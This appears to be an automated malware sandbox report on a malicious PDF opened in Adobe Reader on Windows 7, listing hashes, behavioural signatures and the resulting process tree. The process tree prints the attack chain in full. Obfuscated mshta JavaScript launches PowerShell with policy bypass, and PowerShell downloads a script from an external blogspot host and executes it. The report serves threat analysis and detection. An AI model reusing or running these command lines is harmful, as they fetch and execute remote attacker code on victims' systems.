Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
20/03/2025, 14:21
General
-
Target
68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da.pdf
-
Size
40KB
-
MD5
9cb482f484a11d1483aa39ad189b8cc3
-
SHA1
e8dca89bc15a02ee70af61f76c669d55af6917ec
-
SHA256
68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da
-
SHA512
6a5e6ec234f2af41846dc8447f334c3d8a067bf1834b9b92765e5c478ade25cd7c69f25660d84f1e3b1b725c31030813cee21c1f26a880d1cacb85c34c681ddc
-
SSDEEP
384:PhwVVcX8YbmWG3cdW0nwcP3r+8cQe1uFHwl:5xMYbWWjPCTQe1uFHwl
Malware Config
Extracted
https://'
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da.pdf"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:var Skw = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://' + 'marchkala3-19-25' + '.b' + 'logspot.c' + 'om' + '/lundmurred.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], def = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ghi = new ActiveXObject(Skw[0]); ghi[Skw[1]](Skw[2], Skw[3], Skw[4], Skw[5], Skw[6]);close()"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://marchkala3-19-25.blogspot.com/lundmurred.doc) | . iex;Start-Sleep -Seconds 7;3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50e94a345770fb70ff92056159cc12464
SHA19a5eaf013e74e2ac69c6674e05c0dce8b2b38acb
SHA256650ae4437dc51c91ed15add80cb2b0289c4a71774abbe65d4dc69c44e2a17df6
SHA512ae78159a58db1b98a5f81c9545301684c52023c3ccaaaf34278fab58d0281bcf1a99668edbb3270fbb90cfb7d49615d6b72afde61b548cd39a4e0c8fbccb76e6